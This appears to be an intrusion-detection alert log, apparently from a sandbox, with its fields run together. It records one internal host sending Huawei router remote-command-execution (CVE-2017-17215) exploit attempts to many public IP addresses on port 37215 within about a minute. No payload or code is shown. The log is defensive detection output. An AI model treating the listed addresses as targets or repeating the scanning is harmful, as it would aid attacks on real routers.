                                                    07/10/24-08:26:31.086358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4323837215192.168.2.14197.41.227.88
                                                    07/10/24-08:26:11.148653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278437215192.168.2.14197.83.244.91
                                                    07/10/24-08:27:27.076918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126637215192.168.2.14112.172.193.250
                                                    07/10/24-08:26:15.869789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516437215192.168.2.14149.70.238.196
                                                    07/10/24-08:27:31.489200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572637215192.168.2.1441.27.223.91
                                                    07/10/24-08:27:31.527963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344837215192.168.2.1441.62.78.103
                                                    07/10/24-08:26:18.000984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678437215192.168.2.14194.101.223.254
                                                    07/10/24-08:27:32.581630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562637215192.168.2.14197.114.253.177
                                                    07/10/24-08:26:22.211996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764637215192.168.2.14157.102.174.50
                                                    07/10/24-08:26:48.029902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233637215192.168.2.1441.157.166.75
                                                    07/10/24-08:27:19.224533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904837215192.168.2.14157.132.91.214
                                                    07/10/24-08:27:10.609606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721037215192.168.2.1441.159.198.242
                                                    07/10/24-08:27:11.528287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943437215192.168.2.1414.136.119.120
                                                    07/10/24-08:27:22.853545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798037215192.168.2.14197.14.92.130
                                                    07/10/24-08:27:22.757983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322637215192.168.2.14197.93.84.248
                                                    07/10/24-08:26:34.224904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637037215192.168.2.14157.22.2.99
                                                    07/10/24-08:26:28.743244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3447837215192.168.2.14197.41.211.137
                                                    07/10/24-08:26:38.647269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903237215192.168.2.14197.114.14.46
                                                    07/10/24-08:26:15.827903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472437215192.168.2.14197.23.228.64
                                                    07/10/24-08:26:47.854499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951637215192.168.2.1441.222.138.200
                                                    07/10/24-08:27:22.439779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413637215192.168.2.14197.197.201.26
                                                    07/10/24-08:26:22.291086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506637215192.168.2.1441.215.115.115
                                                    07/10/24-08:26:22.280856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358637215192.168.2.1441.29.21.42
                                                    07/10/24-08:26:29.812084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073637215192.168.2.1441.183.173.67
                                                    07/10/24-08:26:45.583882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146837215192.168.2.1441.68.4.112
                                                    07/10/24-08:26:13.838798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667437215192.168.2.1441.129.207.1
                                                    07/10/24-08:27:31.439490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473837215192.168.2.14197.198.24.20
                                                    07/10/24-08:27:05.178122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641837215192.168.2.14157.232.6.29
                                                    07/10/24-08:27:19.219162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5234237215192.168.2.1481.79.209.24
                                                    07/10/24-08:26:18.006056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619437215192.168.2.14157.7.228.224
                                                    07/10/24-08:27:02.951935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374637215192.168.2.1443.208.36.108
                                                    07/10/24-08:26:41.469973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311437215192.168.2.1441.179.158.110
                                                    07/10/24-08:27:30.419826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375237215192.168.2.14157.147.74.99
                                                    07/10/24-08:27:24.891273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569837215192.168.2.14167.171.114.169
                                                    07/10/24-08:27:33.751241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382637215192.168.2.1441.201.0.232
                                                    07/10/24-08:26:26.557067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003437215192.168.2.14186.72.251.155
                                                    07/10/24-08:26:22.243127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758237215192.168.2.14197.172.1.87
                                                    07/10/24-08:26:38.543702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278637215192.168.2.14197.131.91.106
                                                    07/10/24-08:26:11.128878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617237215192.168.2.14157.23.38.169
                                                    07/10/24-08:26:18.019292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4871837215192.168.2.14157.184.179.153
                                                    07/10/24-08:26:38.544171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895237215192.168.2.1441.237.200.249
                                                    07/10/24-08:27:08.435452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827837215192.168.2.14117.159.8.80
                                                    07/10/24-08:27:28.139663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504637215192.168.2.14157.124.222.37
                                                    07/10/24-08:26:13.645814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011437215192.168.2.14151.236.43.241
                                                    07/10/24-08:26:34.238024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677237215192.168.2.14197.74.252.127
                                                    07/10/24-08:27:34.124026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705837215192.168.2.14157.255.134.138
                                                    07/10/24-08:26:49.778031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281237215192.168.2.14157.132.213.70
                                                    07/10/24-08:26:13.819139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277037215192.168.2.14197.163.81.243
                                                    07/10/24-08:26:26.593421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826637215192.168.2.14157.45.55.106
                                                    07/10/24-08:26:29.863602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4341637215192.168.2.1441.216.98.127
                                                    07/10/24-08:26:48.027883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354637215192.168.2.1441.76.126.47
                                                    07/10/24-08:27:07.381447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512837215192.168.2.14197.48.85.25
                                                    07/10/24-08:26:13.825094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412437215192.168.2.1441.184.171.245
                                                    07/10/24-08:26:28.798195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498037215192.168.2.1441.217.189.41
                                                    07/10/24-08:26:52.018134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554437215192.168.2.14157.193.182.254
                                                    07/10/24-08:26:57.665893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3957437215192.168.2.1478.158.17.14
                                                    07/10/24-08:26:36.427022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415637215192.168.2.1441.165.34.40
                                                    07/10/24-08:26:59.771791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810437215192.168.2.1441.209.225.136
                                                    07/10/24-08:26:52.021968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474237215192.168.2.14157.224.26.215
                                                    07/10/24-08:27:07.272369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418637215192.168.2.14205.60.29.54
                                                    07/10/24-08:27:30.461336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759637215192.168.2.1441.60.79.119
                                                    07/10/24-08:26:53.199768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306637215192.168.2.1441.63.121.16
                                                    07/10/24-08:26:43.688834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688237215192.168.2.14197.126.130.97
                                                    07/10/24-08:26:34.224175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112437215192.168.2.14102.134.216.164
                                                    07/10/24-08:26:47.941431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609637215192.168.2.14197.140.43.114
                                                    07/10/24-08:26:13.775247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721237215192.168.2.14157.133.113.199
                                                    07/10/24-08:26:43.870525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291837215192.168.2.14197.213.117.1
                                                    07/10/24-08:26:11.566830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541437215192.168.2.1441.78.233.208
                                                    07/10/24-08:26:53.185789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255037215192.168.2.14197.195.79.104
                                                    07/10/24-08:26:28.750375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566437215192.168.2.1441.33.80.10
                                                    07/10/24-08:27:02.845068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702037215192.168.2.14197.166.59.3
                                                    07/10/24-08:26:59.647956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5610837215192.168.2.14157.246.45.84
                                                    07/10/24-08:26:11.663157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892037215192.168.2.1441.100.48.34
                                                    07/10/24-08:26:18.009286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776237215192.168.2.1431.245.30.141
                                                    07/10/24-08:26:43.731186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869037215192.168.2.14197.220.105.175
                                                    07/10/24-08:26:43.873718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109037215192.168.2.1441.65.3.245
                                                    07/10/24-08:26:52.010263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771437215192.168.2.14169.179.150.226
                                                    07/10/24-08:26:53.185789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779237215192.168.2.1441.97.63.138
                                                    07/10/24-08:26:47.992323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084837215192.168.2.14197.87.179.120
                                                    07/10/24-08:27:13.990374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639437215192.168.2.14157.8.233.29
                                                    07/10/24-08:26:51.986652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980037215192.168.2.1438.158.153.9
                                                    07/10/24-08:27:13.996261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376837215192.168.2.14157.54.134.185
                                                    07/10/24-08:27:17.025929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654037215192.168.2.14197.40.218.124
                                                    07/10/24-08:27:27.029781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993237215192.168.2.14197.60.90.236
                                                    07/10/24-08:26:42.416063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685637215192.168.2.1451.198.111.38
                                                    07/10/24-08:26:14.810529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738837215192.168.2.14157.243.42.124
                                                    07/10/24-08:27:22.468391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280437215192.168.2.14148.54.211.134
                                                    07/10/24-08:27:20.498164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4517437215192.168.2.1441.174.141.5
                                                    07/10/24-08:27:19.184506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699237215192.168.2.1441.45.123.217
                                                    07/10/24-08:26:57.593723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351437215192.168.2.1441.160.109.81
                                                    07/10/24-08:26:57.640182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487237215192.168.2.14197.59.31.22
                                                    07/10/24-08:26:34.214709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090437215192.168.2.14171.168.92.205
                                                    07/10/24-08:27:13.982789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4788637215192.168.2.14197.170.215.173
                                                    07/10/24-08:27:10.660823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242237215192.168.2.14157.246.22.227
                                                    07/10/24-08:26:11.530155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741637215192.168.2.14152.57.176.37
                                                    07/10/24-08:26:49.831923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326037215192.168.2.1441.98.82.190
                                                    07/10/24-08:27:23.873303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475637215192.168.2.14128.111.217.199
                                                    07/10/24-08:26:55.384906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038437215192.168.2.1495.23.202.91
                                                    07/10/24-08:27:22.571545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997237215192.168.2.14161.229.151.202
                                                    07/10/24-08:26:45.588243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846837215192.168.2.1441.255.171.49
                                                    07/10/24-08:27:08.402603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868037215192.168.2.14195.127.13.221
                                                    07/10/24-08:27:28.160478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698237215192.168.2.14157.140.40.243
                                                    07/10/24-08:26:28.746894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420037215192.168.2.14157.250.148.43
                                                    07/10/24-08:26:42.399244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690637215192.168.2.14197.202.8.13
                                                    07/10/24-08:27:17.061013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007437215192.168.2.14157.32.19.40
                                                    07/10/24-08:27:20.428131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992837215192.168.2.14100.159.211.192
                                                    07/10/24-08:27:02.998271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514637215192.168.2.14146.223.62.147
                                                    07/10/24-08:27:11.474921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822437215192.168.2.1441.190.135.4
                                                    07/10/24-08:27:10.542013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371237215192.168.2.1441.204.100.129
                                                    07/10/24-08:27:32.593829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618637215192.168.2.14219.127.139.158
                                                    07/10/24-08:26:23.284059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665837215192.168.2.14122.41.133.250
                                                    07/10/24-08:26:53.168197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3712837215192.168.2.1441.13.73.81
                                                    07/10/24-08:26:13.764508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565637215192.168.2.14197.162.249.93
                                                    07/10/24-08:26:43.655824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282237215192.168.2.14197.0.222.47
                                                    07/10/24-08:26:15.811251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046437215192.168.2.14197.215.90.211
                                                    07/10/24-08:27:11.512071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377637215192.168.2.14157.184.211.243
                                                    07/10/24-08:27:05.234090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115237215192.168.2.14157.10.135.138
                                                    07/10/24-08:27:19.238531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350837215192.168.2.14157.125.53.24
                                                    07/10/24-08:27:23.900911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295237215192.168.2.14207.90.242.89
                                                    07/10/24-08:26:18.018737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993037215192.168.2.1441.113.226.188
                                                    07/10/24-08:27:23.939164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362837215192.168.2.14197.217.136.15
                                                    07/10/24-08:26:57.659846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683437215192.168.2.14157.162.100.151
                                                    07/10/24-08:27:05.132533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.14159.82.114.62
                                                    07/10/24-08:26:42.161476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190637215192.168.2.14197.167.84.137
                                                    07/10/24-08:27:33.817300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326837215192.168.2.14157.41.163.195
                                                    07/10/24-08:26:43.926715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922637215192.168.2.14197.188.11.65
                                                    07/10/24-08:26:53.152764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4007237215192.168.2.14165.207.158.40
                                                    07/10/24-08:27:28.093525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387237215192.168.2.14197.220.13.52
                                                    07/10/24-08:27:28.181617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061237215192.168.2.1458.2.107.117
                                                    07/10/24-08:27:33.901645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300637215192.168.2.14197.177.162.244
                                                    07/10/24-08:26:47.910402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130237215192.168.2.14157.253.155.18
                                                    07/10/24-08:26:28.652584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652237215192.168.2.1441.224.24.2
                                                    07/10/24-08:27:34.135035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298437215192.168.2.14197.42.51.33
                                                    07/10/24-08:26:43.907475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794237215192.168.2.1441.112.54.244
                                                    07/10/24-08:26:15.868019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037437215192.168.2.14157.119.4.223
                                                    07/10/24-08:27:13.983145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778837215192.168.2.1441.90.77.156
                                                    07/10/24-08:27:13.821623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739037215192.168.2.14157.98.188.52
                                                    07/10/24-08:26:47.901324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191437215192.168.2.1441.90.68.94
                                                    07/10/24-08:26:22.278115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682437215192.168.2.14158.227.224.175
                                                    07/10/24-08:27:07.388758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920437215192.168.2.1488.32.85.249
                                                    07/10/24-08:27:17.033866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591837215192.168.2.14157.166.184.3
                                                    07/10/24-08:27:19.211631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011637215192.168.2.1441.80.108.52
                                                    07/10/24-08:26:43.685142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493837215192.168.2.14197.8.27.253
                                                    07/10/24-08:26:38.591499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949437215192.168.2.14179.231.235.90
                                                    07/10/24-08:26:42.447281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986637215192.168.2.1441.33.138.232
                                                    07/10/24-08:26:45.660252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998837215192.168.2.14197.155.245.204
                                                    07/10/24-08:27:27.121135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864037215192.168.2.1441.38.21.187
                                                    07/10/24-08:26:14.621778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4036437215192.168.2.1414.190.67.82
                                                    07/10/24-08:26:38.641366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419637215192.168.2.14197.68.144.246
                                                    07/10/24-08:27:05.154220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929837215192.168.2.1441.210.135.201
                                                    07/10/24-08:27:33.825878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095237215192.168.2.14157.188.55.147
                                                    07/10/24-08:26:23.296739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167437215192.168.2.1441.157.129.28
                                                    07/10/24-08:26:34.214710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714437215192.168.2.14144.139.20.2
                                                    07/10/24-08:27:19.299032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641237215192.168.2.1441.136.243.210
                                                    07/10/24-08:27:20.401175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386437215192.168.2.14220.129.221.188
                                                    07/10/24-08:26:41.517439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684837215192.168.2.1441.151.63.119
                                                    07/10/24-08:26:22.209448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786237215192.168.2.14157.197.194.153
                                                    07/10/24-08:26:43.861688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728437215192.168.2.14162.158.71.127
                                                    07/10/24-08:26:20.080140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468237215192.168.2.1441.157.103.33
                                                    07/10/24-08:27:11.566038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864237215192.168.2.1441.25.73.244
                                                    07/10/24-08:27:17.096498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016037215192.168.2.1441.237.252.239
                                                    07/10/24-08:26:25.469526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667237215192.168.2.14197.183.0.164
                                                    07/10/24-08:26:31.053322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092637215192.168.2.1441.225.209.138
                                                    07/10/24-08:26:57.505236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469237215192.168.2.1435.68.131.185
                                                    07/10/24-08:26:14.762388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038637215192.168.2.1441.83.215.199
                                                    07/10/24-08:26:20.149592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871437215192.168.2.1441.199.85.19
                                                    07/10/24-08:26:13.815313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730437215192.168.2.14157.253.0.55
                                                    07/10/24-08:27:08.389862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999637215192.168.2.1441.190.25.201
                                                    07/10/24-08:26:43.710286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504237215192.168.2.14125.74.32.151
                                                    07/10/24-08:26:43.848848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762237215192.168.2.1499.251.238.3
                                                    07/10/24-08:26:28.850187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677037215192.168.2.14157.64.88.246
                                                    07/10/24-08:27:22.845184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773237215192.168.2.14197.173.29.247
                                                    07/10/24-08:26:20.148886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716637215192.168.2.14197.184.107.247
                                                    07/10/24-08:26:31.065729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283237215192.168.2.1441.204.110.217
                                                    07/10/24-08:27:22.829314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668837215192.168.2.1495.163.204.52
                                                    07/10/24-08:27:23.457605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036037215192.168.2.14197.129.5.176
                                                    07/10/24-08:26:43.722420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917637215192.168.2.14157.58.72.75
                                                    07/10/24-08:27:10.625471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295637215192.168.2.14164.61.139.18
                                                    07/10/24-08:27:19.343143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863037215192.168.2.1452.170.226.199
                                                    07/10/24-08:26:25.481265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088637215192.168.2.14157.240.100.113
                                                    07/10/24-08:27:19.267667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057837215192.168.2.1441.147.1.148
                                                    07/10/24-08:26:33.227132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355637215192.168.2.1441.46.185.165
                                                    07/10/24-08:26:34.222864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630837215192.168.2.1412.58.122.151
                                                    07/10/24-08:27:31.561854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518237215192.168.2.14157.84.81.11
                                                    07/10/24-08:27:13.976199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886237215192.168.2.14157.68.22.215
                                                    07/10/24-08:27:08.323011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961837215192.168.2.1414.111.101.41
